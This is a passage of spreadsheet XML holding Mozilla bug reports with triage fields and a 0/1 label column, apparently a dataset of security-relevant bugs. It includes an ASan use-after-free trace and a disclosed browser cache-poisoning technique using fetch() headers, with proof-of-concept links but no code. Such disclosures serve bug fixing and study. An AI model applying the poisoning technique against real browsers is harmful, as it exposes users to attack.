    #30 0x7f3c5e76b482 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1123:51
    #31 0x7f3c5e76d26a in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1297:20
    #32 0x7f3c5e7588a1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:465:16
    #33 0x7f3c5e75bdf2 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #34 0x7f3c608844ec in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1043:7
    #35 0x7f3c62c26929 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7671:21
    #36 0x7f3c62c22b88 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7465:7
    #37 0x7f3c62c29cdf in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7362:13
    #38 0x7f3c5bad3d29 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1258:3
    #39 0x7f3c5bad2cdc in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:842:14
    #40 0x7f3c5bacfb78 in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:732:9
    #41 0x7f3c5bad19f2 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:614:5
    #42 0x7f3c5bad271c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:470:14
    #43 0x7f3c5a299e82 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:635:28
    #44 0x7f3c5caeb95b in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8888:18
    #45 0x7f3c5cb860ff in nsUnblockOnloadEvent::Run() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8839:11
    #46 0x7f3c5a0b5f01 in mozilla::ValidatingDispatcher::Runnable::Run() /home/worker/workspace/build/src/xpcom/threads/Dispatcher.cpp:259:32
    #47 0x7f3c5a0e7f10 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
    #48 0x7f3c5a0e4958 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #49 0x7f3c5ae89ee1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #50 0x7f3c5adeb080 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #51 0x7f3c5adeb080 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #52 0x7f3c5adeb080 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #53 0x7f3c600aa20f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #54 0x7f3c636e4117 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:854:22
    #55 0x7f3c5adeb080 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #56 0x7f3c5adeb080 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #57 0x7f3c5adeb080 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #58 0x7f3c636e3b36 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:686:34
    #59 0x4eb5c3 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #60 0x4eb5c3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #61 0x7f3c755ef82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #62 0x41cf18 in _start (/home/nils/fuzzer3/firefox/firefox+0x41cf18)
0x615000297cb0 is located 48 bytes inside of 504-byte region [0x615000297c80,0x615000297e78)
freed by thread T0 (Web Content) here:
    #0 0x4bb44b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f3c59f94297 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2664:25
    #2 0x7f3c59f93e97 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2839:3
    #3 0x7f3c59f9aebd in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3839:3
    #4 0x7f3c59f9a6e1 in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3661:9
    #5 0x7f3c59f9d4b3 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4157:21
    #6 0x7f3c5cbc9c92 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1452:3
    #7 0x7f3c5c74121d in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1339:3
    #8 0x7f3c5a1026e1 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:115
    #9 0x7f3c5b8f8134 in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2010:12
    #10 0x7f3c5b8f8134 in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1329
    #11 0x7f3c5b8f8134 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1296
    #12 0x7f3c5b8ff2dc in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:983:12
    #13 0x7f3c63b2fe23 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #14 0x7f3c63b2fe23 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:454
    #15 0x7f3c63b18669 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
    #16 0x7f3c63b18669 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2998
    #17 0x7f3c63afe5ce in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #18 0x7f3c63b2ffa8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
    #19 0x7f3c63b307d2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #20 0x7f3c644ac7e3 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2828:12
    #21 0x7f3c5b841e1b in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:319:18
    #22 0x7f3c63b2fe23 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #23 0x7f3c63b2fe23 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:454
    #24 0x7f3c63b18669 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
    #25 0x7f3c63b18669 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2998
    #26 0x7f3c63afe5ce in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #27 0x7f3c63b2ffa8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
    #28 0x7f3c63b307d2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #29 0x7f3c6473b93e in js::Wrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #30 0x7f3c646f2464 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:23
    #31 0x7f3c6471bee3 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:21
    #32 0x7f3c6471e847 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
    #33 0x7f3c63b30173 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #34 0x7f3c63b30173 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
    #35 0x7f3c63b307d2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #36 0x7f3c644ae4eb in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
previously allocated by thread T0 (Web Content) here:
    #0 0x4bb79c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ec75d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7f3c5e9deee9 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7f3c5e9deee9 in NS_NewHTMLInputElement(already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser) /home/worker/workspace/build/src/dom/html/HTMLInputElement.cpp:126
    #4 0x7f3c5eb71f59 in CreateHTMLElement /home/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:287:41
    #5 0x7f3c5eb71f59 in NS_NewHTMLElement(mozilla::dom::Element**, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser, nsAString const*) /home/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:259
    #6 0x7f3c5cb0cfc2 in nsIDocument::CreateHTMLElement(nsIAtom*) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:12861:28
    #7 0x7f3c60c9cf5a in nsNumberControlFrame::MakeAnonymousElement(mozilla::dom::Element**, nsTArray&lt;nsIAnonymousContentCreator::ContentInfo&gt;&amp;, nsIAtom*, mozilla::CSSPseudoElementType) /home/worker/workspace/build/src/layout/forms/nsNumberControlFrame.cpp:332:40
    #8 0x7f3c60c9d5c9 in nsNumberControlFrame::CreateAnonymousContent(nsTArray&lt;nsIAnonymousContentCreator::ContentInfo&gt;&amp;) /home/worker/workspace/build/src/layout/forms/nsNumberControlFrame.cpp:379:8
    #9 0x7f3c608312be in nsCSSFrameConstructor::GetAnonymousContent(nsIContent*, nsIFrame*, nsTArray&lt;nsIAnonymousContentCreator::ContentInfo&gt;&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4224:26
    #10 0x7f3c6082528a in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&amp;, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10984:3
    #11 0x7f3c6083a2a0 in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:4079:9
    #12 0x7f3c60844b6f in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameItems&amp;) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:6247:3
    #13 0x7f3c60826026 in ConstructFramesFromItemList /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10765:5
    #14 0x7f3c60826026 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&amp;, bool, PendingBinding*, nsIFrame*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:11069
    #15 0x7f3c6082edb3 in nsCSSFrameConstructor::ConstructBlock(nsFrameConstructorState&amp;, nsIContent*, nsContainerFrame*, nsContainerFrame*, nsStyleContext*, nsContainerFrame**, nsFrameItems&amp;, nsIFrame*, PendingBinding*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:12071:3
    #16 0x7f3c6082b2ea in nsCSSFrameConstructor::ConstructDocElementFrame(mozilla::dom::Element*, nsILayoutHistoryState*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:2643:5
    #17 0x7f3c6084dffa in nsCSSFrameConstructor::ContentRangeInserted(nsIContent*, nsIContent*, nsIContent*, nsILayoutHistoryState*, bool, TreeMatchContext*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7859:7
    #18 0x7f3c6084cac6 in nsCSSFrameConstructor::ContentInserted(nsIContent*, nsIContent*, nsILayoutHistoryState*, bool) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:7744:3
    #19 0x7f3c607977c2 in mozilla::PresShell::Initialize(int, int) /home/worker/workspace/build/src/layout/base/PresShell.cpp:1787:26
    #20 0x7f3c6087f5aa in nsDocumentViewer::InitPresentationStuff(bool) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:722:12
    #21 0x7f3c6088f3c9 in nsDocumentViewer::Show() /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2123:12
    #22 0x7f3c62c18559 in SetVisibility /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6513:9
    #23 0x7f3c62c18559 in non-virtual thunk to nsDocShell::SetVisibility(bool) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6503
    #24 0x7f3c5cb59be1 in nsFrameLoader::Show(int, int, int, int, nsSubDocumentFrame*) /home/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:1139:15
    #25 0x7f3c60bda431 in nsSubDocumentFrame::ShowViewer() /home/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:185:22
    #26 0x7f3c60c534ab in AsyncFrameInit::Run() /home/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:92:60
    #27 0x7f3c5c7063ef in nsContentUtils::RemoveScriptBlocker() /home/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5266:15
    #28 0x7f3c607b0548 in ~nsAutoScriptBlocker /home/worker/workspace/build/src/obj-firefox/dist/include/nsContentUtils.h:2961:5
    #29 0x7f3c607b0548 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4185
    #30 0x7f3c5cae4971 in FlushPendingNotifications /home/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:599:5
    #31 0x7f3c5cae4971 in nsDocument::FlushPendingNotifications(mozilla::FlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8032
    #32 0x7f3c5cae4868 in nsDocument::FlushPendingNotifications(mozilla::FlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8028:22
    #33 0x7f3c5cb2af1b in nsFocusManager::CheckIfFocusable(nsIContent*, unsigned int) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1552:8
    #34 0x7f3c5cb278c2 in nsFocusManager::SetFocusInner(nsIContent*, int, bool, bool) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:1182:41
    #35 0x7f3c5cb2a964 in nsFocusManager::SetFocus(nsIDOMElement*, unsigned int) /home/worker/workspace/build/src/dom/base/nsFocusManager.cpp:486:3
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/dom/base/nsINode.h:1596:12 in GetBoolFlag
Shadow bytes around the buggy address:
  0x0c2a8004af40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a8004af50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a8004af60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a8004af70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a8004af80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c2a8004af90: fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd
  0x0c2a8004afa0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a8004afb0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2a8004afc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c2a8004afd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2a8004afe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1515==ABORTING</t>
        </is>
      </c>
      <c r="X1490" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1491">
      <c r="A1491" t="n">
        <v>1379624</v>
      </c>
      <c r="B1491" t="inlineStr">
        <is>
          <t>2017-07-10 06:33:25 -0700</t>
        </is>
      </c>
      <c r="C1491" t="inlineStr">
        <is>
          <t>stylo: Crash in nsCSSFrameConstructor::IsValidSibling</t>
        </is>
      </c>
      <c r="D1491" t="inlineStr">
        <is>
          <t>2017-07-23 10:35:56 -0700</t>
        </is>
      </c>
      <c r="E1491" t="n">
        <v>1</v>
      </c>
      <c r="F1491" t="n">
        <v>1</v>
      </c>
      <c r="G1491" t="n">
        <v>3</v>
      </c>
      <c r="H1491" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1491" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1491" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K1491" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1491" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1491" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N1491" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1491" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1491" t="inlineStr"/>
      <c r="Q1491" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1491" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1491" t="inlineStr">
        <is>
          <t>mozilla56</t>
        </is>
      </c>
      <c r="T1491" t="n">
        <v>1</v>
      </c>
      <c r="U1491" t="n">
        <v>0</v>
      </c>
      <c r="V1491" t="n">
        <v>2</v>
      </c>
      <c r="W1491" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-759b9b09-3656-49db-9ee5-bd30d0170709.
=============================================================
Seen while look at crash stats - all seem to have stylo enabled. 13 crashes/9 installs: http://bit.ly/2sHbCv1</t>
        </is>
      </c>
      <c r="X1491" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1492">
      <c r="A1492" t="n">
        <v>1409133</v>
      </c>
      <c r="B1492" t="inlineStr">
        <is>
          <t>2017-10-16 12:09:34 -0700</t>
        </is>
      </c>
      <c r="C1492" t="inlineStr">
        <is>
          <t>[Photon] Regression: The left side of the tab should not shrink during Drag &amp; Drop on the Tabstrip</t>
        </is>
      </c>
      <c r="D1492" t="inlineStr">
        <is>
          <t>2018-01-11 04:51:31 -0800</t>
        </is>
      </c>
      <c r="E1492" t="n">
        <v>1</v>
      </c>
      <c r="F1492" t="n">
        <v>1</v>
      </c>
      <c r="G1492" t="n">
        <v>2</v>
      </c>
      <c r="H1492" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1492" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1492" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K1492" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1492" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1492" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1492" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1492" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1492" t="inlineStr">
        <is>
          <t>[reserve-photon-visual]</t>
        </is>
      </c>
      <c r="Q1492" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1492" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1492" t="inlineStr">
        <is>
          <t>Firefox 59</t>
        </is>
      </c>
      <c r="T1492" t="n">
        <v>1</v>
      </c>
      <c r="U1492" t="n">
        <v>0</v>
      </c>
      <c r="V1492" t="n">
        <v>22</v>
      </c>
      <c r="W1492" t="inlineStr">
        <is>
          <t>Created attachment 8918990
left_tab-side_shrinking.mov
macOS 10.12.6
58.0a1 (2017-10-16) (64-Bit)
1.) Drag a tab little bit
2.) Drop it
Expected: The left side of the tab should not shrink
Actual: Left side of the tab shrinks.
A screencast is attached.
Looks like a regression of bug 1406691.
Good: 20171012220111
Bad: 20171012100228
Pushlog: https://hg.mozilla.org/mozilla-central/pushloghtml?changeset=0550763a800b</t>
        </is>
      </c>
      <c r="X1492" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1493">
      <c r="A1493" t="n">
        <v>1816390</v>
      </c>
      <c r="B1493" t="inlineStr">
        <is>
          <t>2023-02-13 02:32:39 -0800</t>
        </is>
      </c>
      <c r="C1493" t="inlineStr">
        <is>
          <t>Browser cache poisoning attack using fetch() with different headers</t>
        </is>
      </c>
      <c r="D1493" t="inlineStr">
        <is>
          <t>2024-09-16 00:16:42 -0700</t>
        </is>
      </c>
      <c r="E1493" t="n">
        <v>1</v>
      </c>
      <c r="F1493" t="n">
        <v>1</v>
      </c>
      <c r="G1493" t="n">
        <v>3</v>
      </c>
      <c r="H1493" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1493" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1493" t="inlineStr">
        <is>
          <t>Networking: Cache</t>
        </is>
      </c>
      <c r="K1493" t="inlineStr">
        <is>
          <t>Firefox 109</t>
        </is>
      </c>
      <c r="L1493" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1493" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1493" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1493" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1493" t="inlineStr">
        <is>
          <t>[necko-triaged][necko-priority-queue][adv-main123+]</t>
        </is>
      </c>
      <c r="Q1493" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1493" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1493" t="inlineStr">
        <is>
          <t>123 Branch</t>
        </is>
      </c>
      <c r="T1493" t="n">
        <v>1</v>
      </c>
      <c r="U1493" t="n">
        <v>0</v>
      </c>
      <c r="V1493" t="n">
        <v>79</v>
      </c>
      <c r="W1493" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Steps to reproduce:
# TL;DR
If the right set of circumstances are present, Fetch can be used to pre-load the browser private cache, and poison normal navigation. Using this approach, a range of attacks that were previously thought to be unexploitable, can be unlocked and made practical. Hurrah!
# Blah Blah Blah
The reason that this works is because the browser shares the private cache between Fetch and normal navigation, with the cache key being based upon the URI and originating context. However, because Fetch is able to add headers to the request that can vary the response (but which are not included in the cache key), an attacker can pre-request resources to poison the private cache, then force the browser to navigate to the page, which activates the attack.
To make this work requires two things:
- The Fetch request and response must be cacheable under normal circumstances by the browser. Typically, a GET method, and the response must be implicitly cacheable (301/308 status code, and last-modified header), or explicitly cacheable (cache-control, pragma and expires headers).
- The target endpoint must pass a pre-flight check, as adding additional headers to a Fetch request requires CORS. 
As an interesting observation, the response does not always have to be made available to Fetch for the browser cache to be updated. For example, if the pre-flight passes, but the actual response does not have an access-control-allow-origin header, then it will be blocked due to CORS. But even so, the cache will sometimes still be updated successfully.
# Recommendations
It is recommended that additional information is added to the cache key, so that requests made by Fetch and the normal navigation are separated.
# PoC
The following PoC links launch same-origin, same-site and cross-origin tests, either directly or from within an iframe data URI (to force a null origin).
## 301 status code (direct)
- cross-site: https://p1.scarlet.ae/ff229a50-9266-4741-a478-ff91383525fa
- same-site: https://p1.smelter.org/ff229a50-9266-4741-a478-ff91383525fa 
- same-origin: https://p2.smelter.org/ff229a50-9266-4741-a478-ff91383525fa
## 200 status code (direct)
- cross-site: https://p1.scarlet.ae/9991460e-55db-49eb-8716-f4c72fd74d0c
- same-site: https://p1.smelter.org/9991460e-55db-49eb-8716-f4c72fd74d0c
- same-origin: https://p2.smelter.org/9991460e-55db-49eb-8716-f4c72fd74d0c
## 301 status code (iframe)
- cross-site: https://p1.scarlet.ae/17a031ba-cd6e-4cc0-af06-4c3f80354731
- same-site: https://p1.smelter.org/17a031ba-cd6e-4cc0-af06-4c3f80354731
- same-origin: https://p2.smelter.org/17a031ba-cd6e-4cc0-af06-4c3f80354731
## 200 status code (iframe)
- cross-site: https://p1.scarlet.ae/e5b1e318-d679-4b47-b113-744cc97bcacf
- same-site: https://p1.smelter.org/e5b1e318-d679-4b47-b113-744cc97bcacf
- same-origin: https://p2.smelter.org/e5b1e318-d679-4b47-b113-744cc97bcacf
Actual results:
as above
Expected results:
as above</t>
        </is>
      </c>
      <c r="X1493" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1494">
      <c r="A1494" t="n">
        <v>494900</v>
      </c>
      <c r="B1494" t="inlineStr">
        <is>
          <t>2009-05-26 09:22:31 -0700</t>
        </is>
      </c>
      <c r="C1494" t="inlineStr">
        <is>
          <t>Jetpack's status bar panels prevent other add-ons from loading in the status bar</t>
        </is>
      </c>
      <c r="D1494" t="inlineStr">
        <is>
